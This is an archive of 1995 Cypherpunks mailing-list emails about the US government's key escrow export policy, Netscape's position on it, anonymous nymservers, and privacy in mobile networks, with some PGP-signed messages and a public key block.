Date: Tue, 5 Dec 95 23:23:12 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Info on Netscape's key escrow position
Message-ID: <9512060724.AA13235@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "James M. Cobb"  
 
Blanc, 
  
On 12 02 95 you pointed to: 
 
   ...an underlying problem, which is of not having a sense 
   of freedom to stand up to the Dark Side. 
 
 You have put your finger on perhaps THE problem: Why did 
we cast aside our sense of freedom?  How may we re-ignite 
the spirit of freedom? 
.........................................................

Yes, I think it's a pretty important element to ponder, this lack of the sense 
of freedom.  I don't think that "we" all (especially on this list!) have cast 
it aside.  

I do notice that it seems to dissipitate the closer that one gets to govmt 
agencies (or vice versa).  I have often heard people say "well, if it becomes a 
law, we'll have to uphold it".  That seems to be the end of all effort towards 
reality, as though no further advancements toward truth were possible.  It's a 
continual problem, fostered from being in the lower rungs of the pecking order 
of "authority" and then beginning to think that one rightly belongs there.

Yet how often, especially lately, does technological progress make obsolete 
what yesterday was an "important" social/political issue requiring "offical 
intervention" from higher authorities to impose the lowest standards of 
functioning so that everyone could "get along".

Sometimes the issue just goes away from atrophy or obsolescence, once certain 
talented individuals discover new, improved ways of getting things done.  Of 
course, there's still always another social fear to overcome, and the more that 
inventors & scientists & techonologists push back the envelope of what is 
possible (especially in the field of electronics & communication), the closer 
they get to the gist of the problem with people's attitudes & behavior toward 
each other, and the closer also to the governing agencies which were created to 
deal with these concerns.
 
Some things I know which inspire the sense of freedom to stand up to the Dark 
Side is to have definite knowledge, integrity, a personal vision of the future 
(an ideal), and some really useful tools (be they hardware or software).  

This list is intended to focus on the tools of cryptography in relation to 
privacy, James, and far-off digressions are discouraged because of the volume 
of mail which this would result in.  So do try to focus on that, won't you, or 
you'll continue to hear from Perry, who works tirelessly to keep everyone in 
line.  :>)

  ..
Blanc
 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 5 Dec 95 20:26:05 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <199512060426.XAA20883@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell writes:
> I just got back from the NIST GAK export meeting. This is
> a short writeup of a summary. 

(I should probably wait for a longer version, but what the hey...)

[...]
> (2) since the 64-bit limit was severly criticized at
> the Sept meeting, why is it still needed if there is also escrow?
[...]
> and on the 64-bit issue, that the government is "not certain it will
> work." he says they "want to see it implemented and want to see
> how it works" because 64-bit encryption is very strong. If the escrow
> doesn't work, they don't want a lot of softare to be in widespread use.

This answer sounds rather silly to me. Do they seriously doubt that the
escrow mechanism works (modulo MAB's observations about the LEAF), or expect 
us to believe that they do ?  Clinton Brooks' comments cited later by Pat
suggest a certain acceptance that enforcement will have its problems
(e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't
officially share that view. Is there another interpretation of "working"
I'm missing here ?

-Futplex <futplex@pseudonym.com>
"I'm from the D.O.E. and I just need to leave this here temporarily"
	(from a political cartoon entitled "The 3 Biggest Whoppers")



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 5 Dec 95 20:31:56 PST
To: pfarrell@netcom.com
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <199512060427.XAA09688@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I just got back from the NIST GAK export meeting. This is
> a short writeup of a summary. I'll post a longer version later
> this evening or early tomorrow morning.

Pat did not mention the first thing I observed.

Attendence was roughly 20% (yes, one fifth) of September.

ISTM industry is tired of hearing the same words in a different order.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 22:40:37 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <acea7b990d021004cc3a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 AM 12/6/95, Thaddeus J. Beier wrote:

>I thought that this would happen, immediately on reading that there was
>going to be this meeting.  From Pat and John Young's reports on the previous
>meeting, it was almost a revolt; almost everyone in attendence thought that
...

Man, whatever government type thought up this idea of getting "industry
input" is gonna have his head handed to him!

Democracy really sucks at times.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 6 Dec 95 00:25:26 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNEsF-00090XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



>>1.  Write a program with limited encryption (40 bit?), with the encryption
>>module in a file external to the  main program.
>>2.  Get export approval for this program.
>>3.  Write a module which replaces the encryption file, increasing key size
>>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>>PGP, etc.)
>>4.  Ship that new module with the old software to US customers.
>>Naturally, that new module will "leak," so anybody who buys the old
>>program out of the country can convert to a fully-functional version by
>>downloading it from a foreign bbs that just happens to have it.  The
>>module can be encrypted/signed by the manufacturer so everyone can be sure
>>of its identity and genuineness.
>>
>>
>>Better than nothing, I suppose.
>
>"Crypto hooks," basically the scheme you are proposing, were thought of by
>the authorities and are not a bypass of the crypto export laws.
>--Tim May


I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that if the goal is to:

1.  Let companies like Netscape make foreign sales.

2.  Still comply with the letter of the law.


Then this would be an excellent way to achieve both those goals.  (I accept as axiomatic that if the only exportable encryption is GAKked, they're not going to be viewed seriously as a product.  A way around GAK would actually increase their profits.)

BTW, the fact that they might be "thought of" by the authorities is not going to be enough to stop them.  If the USG claims that it WILL approve GAK-ified software, it is unclear how they will decide if a given program qualifies.  Since every program of length "N" is only an XOR away from every OTHER program of length "N", modifying or disabling this software is always possible.  Remember, the reason (or, at least, one of them!) they put Clipper into a physical chip as opposed to releasing the algorithm was to prevent modifications that would subvert the algorithm.  Their decision to allow software key-escrow presumably forces them to accept certain possibilities they otherwise wanted to avoid.

If the USG tries to take the position that "any program which can be modified into another program that gets around GAK is prohibited from export," then they're going to have to stop allowing the export of pre-formatted floppy disks because they're likewise an XOR away from PGP.

So we're back to square one:  Does the USG intend to allow ANY programs to be exported?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 22:59:09 PST
To: cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <acea7e580f021004716a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:35 AM 12/6/95, Anonymous wrote:

>Tim May 12/5/95 6:25 PM:

>>One "defensible" (and maybe even good) reason is because someone with
>>government clearance can then be prosecuted for leaking what they know,
>>whereas ordinary citizens are harder to prosecute for this. I doubt this is
>>the main reason, but it makes a certain kind of sense.
>
>      Nice point, though I too doubt that's the reason: if *every* agent
>needed to be cleared, then this clearance stipulation would serve nicely,
>but if only *one* at every escrow agency needs to be cleared...

No, I didn't make that basic a logical blunder. What I was thinking, even
if I didn't go into it, is that the "cleared" agent would be the one within
the office who would actually handle the surveillance.

But I do think the more basic reason is really that the intelligence
agencies want a direct channel to "their" guy.

I'm really pleased to hear about the 20% attendance. Nothing trivializes a
program more than being ignored.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 23:18:59 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <acea846c10021004df03@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


jim bell proposes "crypto hooks":

>1.  Write a program with limited encryption (40 bit?), with the encryption
>module in a file external to the  main program.
>2.  Get export approval for this program.
>3.  Write a module which replaces the encryption file, increasing key size
>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>PGP, etc.)
>4.  Ship that new module with the old software to US customers.
>Naturally, that new module will "leak," so anybody who buys the old
>program out of the country can convert to a fully-functional version by
>downloading it from a foreign bbs that just happens to have it.  The
>module can be encrypted/signed by the manufacturer so everyone can be sure
>of its identity and genuineness.
>
>
>Better than nothing, I suppose.

"Crypto hooks," basically the scheme you are proposing, were thought of by
the authorities and are not a bypass of the crypto export laws.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 16:04:06 PST
To: jwarren@well.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <199512052356.AAA09563@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From Pat Farrell's <pfarrell@netcom.com> short summary of the NIST GAK
meeting (12/5/95 5:49 PM):

>My favorite policeman, Geoff Greiveldinger, then described the
>characteristics of an acceptable key escrow agent. There was a long list
>of criteria, all unseen before the meeting. The general reaction
>of the audience was that these were "yet another set of criteria that
>must be met." Geoff claimed that they were simply trying to address
>the questions raised at the earlier meeting about who is an
>acceptable escrow agent. One point that caused a lot of concern
>was that at least one employee of the escrow agent has to have a SECRET
>clearence.

      (Thanks for the summary, Pat.)
      This last bit is really rich. I can't think of a single publically
defensible reason for the stipulation that every escrow agent must employ
someone with SECRET clearance, but I *can* think of a publically
indefensible reason for it -- to facilitate those spooky non-court wiretap
authorizations that've been alluded to in the fine print of the GAK
proposals.

      Of course, just because escrow agents would be required to hire
*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
clearance would fill the bill. And that's the rub: the administration of
clearing people-with-SECRET-clearances for escrow agent employment would
be conducted -- where else? -- *in secret*. SECRET clearance, of course,
wouldn't be the salient criterion; after all, there are people on the
Cypherpunks list -- and a few who aren't on it but are like-minded --
who'd be, uh, reluctant to deliver keys in the absence of a a wiretap
authorized by a judge.
      And, as a petty aside, it's nice to see that the gov't had cooked up
yet another way to force potentially legitimate businesses to pay its
stoolpigeons to chip away out our civil rights.


Hieronymous


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMTbw73g0mNE55u1AQEyPQIAsFDidHJrD7fjCee8Wa7ufj7MFnvJGYCQ
zGZR7VdtpV4IGp52SvW8UBiJjv7FeWkmwwGWD43MN/88f79MpTCO3Q==
=DOoi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 23:49:53 PST
To: cypherpunks@toad.com
Subject: Re: The "Future" Fallacy
Message-ID: <acea8b9b110210048f27@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:24 AM 12/6/95, blancw@accessone.com wrote:
>From: Duncan Frissell
>
>Bill Gates (like Mister Newt before him) committed what I call the Future
>Fallacy in "The Road Ahead."  Page 106.
>
>"Soon any child old enough to use a computer will be able to transmit coded
>messages that no government on earth will find easy to decipher."
>...................................................
>
>
>Billg is an optimist.
>
>What's wrong with this picture, Duncan?

I found nothing wrong or incorrect with the quote Duncan attributed to Bill
Gates (I haven't read Gates' book).

I couldn't understand Duncan's koan, shrugged, and moved on.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Wed, 6 Dec 95 00:33:48 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512060641.BAA01380@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


Gondolin Technologies is proud to announce a new nymserver for the online 
community at <alias@nym.gondolin.org>.

This is the same service that is presently provided to the net at 
alpha.c2.org, utilizing software written by Matt Ghio <ghio@c2.org>.

A nymserver allows any person with access to email to anonymous create an 
alias at <username@nym.gondolin.org> through which they may send/receive 
email.  This psuedonym is completely anonymous, and the identity of the 
user cannot be revealed as it is contained within a PGP encrypted reply 
block (unlike anon.penet.fi).

For more information, send a message to <help@nym.gondolin.org> and the 
help file with directions will be automatically sent to you.

The PGP public key for the alias-creation address is below:


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzC9I5YAAAEEAOvpLWjR1klfwpoQOtMA/qGsMtVtjtblpvNiMMkTxX3NVzib
WnN1ZwhvLY3P/SqduLF2U4yzH6jVKiJJjzQG082K2MuW6wtl1GJYuw1/EPKDrBHj
ksmvyXkX+DNOj/3cH6aKSlYALNClVF4yZkr3NTWE6Phr9LEREuSoorTnBJytAAUR
tDFHb25kb2xpbiBBbHBoYSBOeW1zZXJ2ZXIgPGFsaWFzQG55bS5nb25kb2xpbi5v
cmc+iQCVAwUQML6SAo6H3ZT4asdZAQE3uwP/aazOIAYzUBHs/oLhtCc4auE8jF6k
wue/3JJq/ECpGskOYsggQAp98FPmLFzJfxgEREaC5vBt9Rac71IMwJ0r9PUp59bz
n85bgem+lVxL0VmMR9sTsW9bYGkMGdSIvN8Q0gJHkCUXCMq2/Vp3dVXP4j2QCOFK
RuuhlkCD2nqHCd2JAJUDBRAwvorfF139v5zDbCEBAXMxA/45lRrmTn4BpGt0qbiR
Nr3XPh+ftQb3lQ0XDuwTDODgv/FjGiU2dM7v85tZAR8e2p7AeHoKvxFVJivP2/rR
GqAHoOh52O4s6Zf1EhqsDAsFYthCjRNK8ASaUWLTljmx7kCQXiTWwPcJHnvHeXe5
nGnoXolVlZk7R5gFTAR7HkrNaIkAlQMFEDC9Jf370BoEO1CTGQEBuj4D/0amfilf
Cli23RngrLM8FLYo7HQoL5vG6IO/d6hedeiQG+9KeSTnyeiWHXsAYjZ8TNQ5pPyt
IUhsPxO9AkdYqW9oXqwRUfrkhhPS+R8eg1IN2kpdNsKiJvibhnuHZGOhmgc45yin
eJ6kD/vuOg5gZXRIOCUd5usz1xyx0J7c50cj
=5gm8
-----END PGP PUBLIC KEY BLOCK-----


Please direct any complaints, comments, or concerns to 
<admin@nym.gondolin.org>.

-Bryan Strawser, System/Network Administrator, Gondolin Technologies





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 6 Dec 95 03:01:18 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512060722.XAA25437@blob.best.net>
Message-ID: <30C56CF3.2947@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 04:59 PM 12/4/95 -0600, Scott Brickner wrote:
> >Netscape has pretty clearly said that they don't like the idea of GAK,
> 
> Actually netscape has not said that:
> 
> Jeff has said that netscape *will* say that real soon now.

  Our representative at the NIST meeting said it there today.
It should be up on the web site in a few days when he gets
back from DC.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Wed, 6 Dec 95 00:54:33 PST
To: cypherpunks@toad.com
Subject: Untraceability in Mobile Networks
Message-ID: <9512060854.AA12541@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

FYI, at MobiCom '95, an ACM sponsored conference, an interesting paper
entitled, _Untraceability in Mobile Networks_, was presented.  The
authors of the paper are Didier Samfat, Refik Molva and N. Asokan.

For order info contact: acmhelp@acm.org
ACM ISBN: 0-89791-814-2
ACM Order Number: 533952

As per the ACM rule, ``Abstracting with credit is permitted,'' I
abstract ideas from the paper below.

- From the paper's abstract: ``User mobility is a feature that raises
many new security-related issues and concerns.  One of them is the
disclosure of a mobile user's real identity during the authentication
process, or other procedures specific to mobile networks.  Such
disclosure allows an unauthorized third-party to track the mobile
user's movements and current whereabouts.  Depending on the context,
access to any information related to a mobile user's location without
his consent can be a serious violation of his privacy.''

The paper, along with other ideas of interest to the Cypherpunk,
presents a classification system for arguing about the tradeoff
between user authentication, user privacy (with respect to various
entities in the network), user billing and user conveniences (such as,
``can others find the mobile user through his home agent?'') in mobile
networks.  The rest of the paper uses the classification scheme, which
really is just a convenience way of mapping all the players in the
network to the information they are allowed to ever know about a user
that has an expectation of a certain level of privacy.

The classification scheme models the following useful information
regarding users: the full identity of the user f, the identity of
the user's home domain h, and the identity of the user's current
remote domain r.

The classification scheme has the following players: User U, Home
Domain/Authority H, Remote Domain/Authority R, Legitimate Network
Entities L, and Eavesdroppers E.  They assume U always knows
everything about itself, so they ignore it from the discussion.
Notice that they model no `GAK (Government Access to Key)' or, in this
case, `GAI (Government Access to Identity)' agent.

After laying the groundwork, the authors then set about to discuss the
matrix of known information, according to their classification system,
for various interesting cases:

C1: Hiding User Identity from Eavesdroppers;
C2: Hiding User Identity from Foreign Authorities;
C3: Hiding Relationship Between the User and Authorities;
C4: Hiding the Identity of the Home Authority from Foreign Authorities; and
C5: Hiding User Behavior from Home Authority.

The cases offer more privacy from C1 to C5.  See the paper for the
exact mapping of C[1-5] to the knowledge matrix involving f, h, r
verses H, R, L, E.  The authors, quite correctly, label C5 as in
direct contrast to the intent of a ``big brother'' principle since
``no entity [other than the user] has any information about the
user.''  Attaining C5 in a system would really be the ultimate in user
location/action privacy.  The authors do not discuss the issue, but it
appears to be an open question whether, in light of a conspiracy
involving authorities, whether or not C5 could actually be attained
for a mobile user in a network.  Note: At the other end of the privacy
spectrum is the unlist C0 case.  This correspond exactly to the
classic cellular phone system in that nothing is hidden from
eavesdroppers.  Every relationship box on the knowledge matrix for
case C0 is set to true.

Next, the authors address how the levels of privacy affect and are
affected by other, non-security related, areas of system requirements.
For example, to make the highest levels of privacy work with
cross-authority guaranteed billing, some form of anonymous,
non-repudiable digital cash might be required.

The paper goes on to discuss how GSM, for both voice and packet data
users, and CDPD fail to even completely cover the simplist of privacy
cases, C1!

The authors construct a protocol that provides privacy levels C1 and
C2, then enhance the basic algorithm to provide a hybrid privacy level
somewhere between C4 and C5 (they do not solve all the privacy
problems present when the home and foreign authorities are involved in
a conspiracy --- they do, however, worry about foreign authorities
involved in a local conspiracy amongst themselves).

Finally, the authors give a proof of correctness for the basic
algorithm, an evaluation of its performance and compare their design
to other possible designs.  In sum, this paper is a must read for all
Cypherpunk's interested in the topic of untraceability and user
identification privacy in mobile networks.  To me, the paper appears
to extend the state of the art in several directions since it applies
Chaum's, and other's, ideas to mobile networks, where some tradeoffs
are different from wired, stable networks and some problems are
entirely new.

As a final aside, none of the authors could be present to give the
talk related to the paper, so the advisor of one of the students, Jay
Black of the University of Waterloo, gave the talk.  He mentioned that
he did to not understand why this area of research was important.
Apparently, he has never heard the Cypherpunk's privacy message.
However, he was quite a good sport about presenting the paper.  Later,
in the question period --- a guy, later outed as with the
U. S. government --- raised the same issue in a more hostile tone.
All I can say to the unknown G-Man, ``Are you totally clueless?  This
is a country that was founded upon the principles of anonymous speech
and one's right to privacy.  It is about time that the people restore
these lost freedoms through technology alone, if possible, or on the
political scene, if required.''

Regards,
Loren

- -- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(708) 576-7794				Call for verification of fingerprints.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMVZ+/8de8m5izJJAQFL9AQAhwzqlJK4fnsnCs09XO7Mnhfej1z+eHrQ
ALhAVNSYphH1qvLAM4veRr+Af+XoP0QO7s6GXu+IHlR5b0r8Qy9qKw5XeIeGra4d
wuqrVngKAd6Pm0G2Gdj6+4ERoNJL9xwIvfswUyMNAai8K+rnqBE9F/yTTRn363T+
dT9CkMq+Wqs=
=MP9H
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 6 Dec 95 01:15:34 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: The "Future" Fallacy
In-Reply-To: <acea8b9b110210048f27@[205.199.118.202]>
Message-ID: <199512060918.DAA06957@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Duncan Frissell quotes Bill Gates:
>"Soon any child old enough to use a computer will be able to transmit coded
>messages that no government on earth will find easy to decipher."

blancw@accessone.com responds:
>Billg is an optimist.
>
>What's wrong with this picture, Duncan?

Then Tim May says: 
> I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> Gates (I haven't read Gates' book).
>
> I couldn't understand Duncan's koan, shrugged, and moved on.


I don't know what blancw was getting at, but I'll take up his side of the
argument.  Can good security really be automated so well that people will
have it without thinking about it? 

I create accounts at an ISP, and 90% of the people who walk in the door
pick terrible passpwords, even after listening to a little speech about
what makes a good one.  I'd be willing to bet that more than half the
people using PGP have passphrases that would fall quickly to a dictionary
attack. 

The child in billg's example might have a giant key sitting on the hard
drive, but it's either going to be sitting there in the clear or protected
by a passphrase.  Will the child pick a good passphrase?

One of the most important arguments we can make against government control
of crypto is that the claims of impenetrability are being oversold on both
sides of the debate.  If the NSA wanted my PGP key badly, they'd have it
and I wouldn't know it.  I can think of lots of ways they could get it,
and I'm not nearly as clever as they are.

Good algorithms and protocols aren't enough:  you need good human
discipline.  The best software in the world won't help me if my passphrase
is "alex1" -- and that's what 25% of the people named Alex will set it to,
providing that you impose the restriction that passphrases must have a
non-alphabetic character.

There's an enormous difference between the amount of care that people in
the intelligence business and casual crypto users take with keys.  Are the
spooks wasting time and energy?  I don't think so -- that's what it 
takes to minimize your risks.  Do I do it?  No.  If someone swapped my 
pgp binary, I'd never know it.

Crypto won't protect us absolutely from surveillance, but it will do a 
very good job of protecting us from automated surveillance.  Right now, 
phones are wiretapped for next to nothing.  If I have a friend who sells 
drugs and I speak with him on the phone frequently, I can get on the 
list.  If they hear something on my phone that keeps them interested, 
another friend of mine can get put on the list as well.  It spreads like 
a viral infection.

That's the sort of thing crypto will put a stop to.  If they want my key, 
they'll be able to grab it.  But it won't be practical for them to grab 
the keys of the ten people I correspond with most just because they 
coreespond with me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 10 Dec 95 22:16:16 PST
Subject: Re: [Mix-L] WARNING: sting via remailer! (fwd)
In-Reply-To: <199512051407.JAA18236@copper.ucs.indiana.edu>
Message-ID: <DJ5Bun.4Cu@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryan Strawser <bstrawse@copper.ucs.indiana.edu> wrote:

>Forwarded message:
[..]
>> 	I was in the federal building coffee shop in Reston, Va. yesterday
>> when I overheard a conversation between what appeared to be two FBI agents
>> discussing a sting operation involving Mixmaster. Hearing the word
>> "mixmaster" naturally caused my ears to perk up and I listened further. 
>> 
>> 	It appears that the FBI has coerced a mixmaster remailer operator
>> into cooperating with them in a sting operation to catch remailers when
>> they forward email pertaining to pornography, pedophilia, and copy-written
>> software. 

Not that such a thing is impossible, but it seems awfully suspicious
that FBI agents would be talking about a case within earshot of the
general public...
 
--Mutant Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 6 Dec 95 01:29:24 PST
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The "Future" Fallacy
In-Reply-To: <acea8b9b110210048f27@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951206042314.18935A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Timothy C. May wrote:

> At 7:24 AM 12/6/95, blancw@accessone.com wrote:
> >From: Duncan Frissell
> >
> >Bill Gates (like Mister Newt before him) committed what I call the Future
> >Fallacy in "The Road Ahead."  Page 106.
> >
> >"Soon any child old enough to use a computer will be able to transmit coded
> >messages that no government on earth will find easy to decipher."
> >...................................................
> >
> >
> >Billg is an optimist.
> >
> >What's wrong with this picture, Duncan?
> 
> I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> Gates (I haven't read Gates' book).
> 
> I couldn't understand Duncan's koan, shrugged, and moved on.
> 

I think Duncan was mad at the 'soon.'  Why not today?

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 19:33:59 PST
To: cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <199512060335.EAA20054@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May 12/5/95 6:25 PM:


>>      This last bit is really rich. I can't think of a single publically
>>defensible reason for the stipulation that every escrow agent must employ
>>someone with SECRET clearance,    <<etc.>>
>
>One "defensible" (and maybe even good) reason is because someone with
>government clearance can then be prosecuted for leaking what they know,
>whereas ordinary citizens are harder to prosecute for this. I doubt this is
>the main reason, but it makes a certain kind of sense.

      Nice point, though I too doubt that's the reason: if *every* agent
needed to be cleared, then this clearance stipulation would serve nicely,
but if only *one* at every escrow agency needs to be cleared...

>But there are other more interesting links between Secret clearances and
>wiretaps.
>
>The "Foreign Intelligence Surveillance Court" meets in Arlington, VA as the
>need arises to authorize wiretaps in private, <interesting but etc.>

>>      Of course, just because escrow agents would be required to hire
>>*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
>>clearance would fill the bill. <etc.>

>Many think tanks and defense contractors have "sheep-dipped" retired
>intelligence officials working for them and continuing to report (in
>various ways) to their former paymasters.
>
>Sometimes these sheep-dipped agents are just there to keep tabs on what's
>going on, sometimes they're there to nudge these companies in certain
>directions, and sometimes they are actually running "deniable" applications
>from the private sector. (Recall Hughes, Air America, Castle Bank, etc.)
>
>I can imagine that if some companies talked about in connection with
>certain questionable activities (Banker's Trust, Bank of America,
>Wackenhut, SAIC, etc.) were to bid for the contract to be a GAK Agent, then
>there would be contacts back to the intelligence agencies.

      Organizations like SAIC seem like "naturals" for GAK escrow agents
-- and they're a forgone conclusion as far as spookery is concerned. What
troubles me is the suggestion that *every* agent *must* hire someone who
might answer to a higher authority, as it were. And what troubles me more
is watching this paragovernment's transparent efforts to reproduce itself
step by step, always trying to elude efforts to make it accountable or
subordinate to civil authorities.

>But most GAK accesses would be handled through normal channels, albeit secret.

      Of course. But most cops and prosecutors haven't developed the
"national security" verbal tic. Yet.

      GAK stinks, but this security-clearance stipulation *really* stinks.
      Of course, I'm preaching to the choir...

Hieronymous

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMUMXL3g0mNE55u1AQHR0wIAj/86ga/1T0FJ7gZt5ZVwlCLt4pq2g0Nt
QpoDWlul6q9ub51k3wwA6Kn1np3NMoYpjLS/bdPew0XUBMJpQs/l/Q==
=AdMm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 5 Dec 95 20:44:07 PST
To: cypherpunks@toad.com
Subject: re: Secret Clearance
Message-ID: <199512060445.FAA22949@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 9:00 PM 12/5/95, Pete Loshin wrote:

